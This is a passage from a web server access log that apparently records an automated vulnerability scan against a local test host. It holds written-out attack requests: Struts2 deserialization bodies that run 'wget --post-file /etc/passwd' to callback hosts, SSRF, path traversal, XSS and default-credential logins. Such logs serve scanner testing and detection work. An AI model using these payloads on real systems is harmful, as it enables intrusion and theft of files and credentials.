\x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DnnImageHandler.ashx?mode=file&url=http://ca28fg0smpvbd3qg07h0czhw43xxutqxb.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sftp-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22User.filter\x22,\x22id\x22: 1,\x22params\x22:{\x22query\x22:{\x22is_active\x22:true}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /json-rpc/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/65 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"loginUsername=admin&loginPassword=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /submitLogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /puppet-ca/v1/certificate_request/29KD25iObKbtQGHXzwC3tZm2dGO HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A ca28fg0smpvbd3qg07h08uga4j1cimatq.oast.live\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /struts2-rest-showcase/orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.circleci/ssh-config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NON_EXISTING_PATH/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pem/login/pages/login.jsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /echo-server.html?code=test&state=http://www.attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/66 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"html_element_selection=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=29KD1xOD2jmPBMUotF7fJGNufkk.php&target=l1_Lw HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translations/en.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/packages/security.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A ca28fg0smpvbd3qg07h0n75ugekutb5bo.oast.live\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/detail.php?subdomain=ca28fg0smpvbd3qg07h0krrq6zttmwp71.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/v1/service-details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/krgourl.php?DOCUMENT_ROOT=http://ca28fg0smpvbd3qg07h0obnbszhdwygdm.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/67 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private-key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) 